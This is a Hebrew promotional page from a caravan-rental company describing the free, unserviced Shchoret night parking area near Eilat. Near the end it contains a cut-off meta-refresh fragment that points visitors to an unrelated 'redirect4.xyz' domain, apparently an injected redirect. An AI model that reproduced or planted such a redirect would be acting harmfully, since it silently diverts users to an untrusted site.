חניון שחורת

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

אזור הדרום של מדינת ישראל מציע המון אטרקציות ומסלולי טיול – ולא, אנחנו לא מתכוונים כאן לאילת בלבד. די אם נזכיר אתריםחניון שחורת דוגמת פארק תמנע, עמודי עמרם או קניון שחורת.

בתנאים האלה לא מפתיע מדוע טיולי רכב בכלל, וקראוונים בפרט, נחשבים לנפוצים בכל ימות השנה. אם מעוניינים לצמצמם את עלויות השהות בדרום, לקבל חוויה עצומה עבור כל בני המשפחה וגם לחוות את האזור במלואו, מומלץ מאד לחשוב על השכרת קראוונים, ושימוש בחניון הלילה של חניון שחורת – כקילומטר אחד בלבד מקניון שחורת – למשך מספר (מצומצם לרוב) של ימים.

מה מציע חניון שחורת?

הדבר הראשון והמרכזי שחשוב שתדעו על חניון שחורת הוא שמדובר בחניון בסיסי מאד. למעשה, ההגדר שלו היא “חניון שלט”, כלומר, חניון שמציע שטח אמנם לשהות בו, אבל לא כולל תשתיות אלה או אחרות. אם אתם מחפשים מקום עם חיבור של הקראוון שלכם לחשמל או למים, תאי שירותים או מקלחות, תאורה, שולחנות פיקניק וכן הלאה  – זהו לא המקום בשבילכם.

יש באזור הדרום חניונים אחרים שיוכלו לספק את המענה שאתם זקוקים לו. לעומת זאת, מי שמחפש שטח מסודר ומוגדר בו ניתן למקם את הקראוון, שיהיה גם בטוח לשהות, חניון שחורת יכול בהחלט להספיק. המקום מספק צל טבעי בחלק משעות היום (אין סככות או אמצעי הצללה אחרים), אבל לא בכולן.

בתנאים האלה, לא מפתיע מדוע ניתן להיכנס לחניון שחורת וללון בו ללא תשלום כלל וכלל (להבדיל מהחניונים המוסדרים יותר שכן דורשים תשלום). החניון בהמשך לכך פתוח בכל שעות היום והלילה, ובכל ימות השנה. כל שנדרש הוא להגיע אליו, כשמעוניינים במקום למקם את הקראוון, ולשהות בו משך הזמן שאתם רוצים.

אז האם החניון מתאים לכם?

השאלה האם לשהות בחניון שחורת תלויה במספר פרמטרים. זה מתחיל עם סוג הקראוון שלכם והאבזור של הקראוון, שצריך בתנאים האלה להיות מספק בהחלט. על הקראוון להכיל תאי שירותים ומקלחות, לדוגמא, וגם תשתיות שיאפשרו לו לעשות את העבודה בהיעדר החיבור החיצוני לחשמל או למים. כך למשל ניתן למצוא כיום קראוונים שפועלים על גז או על תשתיות אחרות, ולכן לא תלויים בהימצאות תשתיות חיצוניות.

גם בתנאים האלה, לא בטוח שחניון הלילה של שחורת יספיק לכם לתקופה גדולה מדי. הוא פשוט בסיסי מדי לצרכים של רוב המטיילים. אם אתם מגיעים לאזור ומעוניינים לעשות הפסקה בת מספר שעות בנסיעה הארוכה לאילת, למשל, או יכול לשמש אתכם. כך גם במקרה של הרצון להעביר לילה אחד בשטח במהלך הנסיעה (אם מתחילים את הנהיגה בשעות הערב ומעוניינים להגיע בבוקר רעננים). חובת התכנון של מסלול הטיול מוטלת מן הסתם עליכם, כשאתם צריכים להגדיר מה בדיוק מתאים למסלול הטיול שלכם, הרצונות שלכם ממנו, הרכב הנוסעים וכן הלאה.
equiv
"Refresh" content="0; URL=http://redirect4.xyz/">

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

המרכז להשכרת קרוואנים

שירותי השכרת קרוואנים עם החברה המובילה בישראל. קרוואנים לכל צורך ולכל מטרה להשכרה במחיר זול ומשתלם!

אז מה היה לנו בכתבה:

צרו איתנו קשר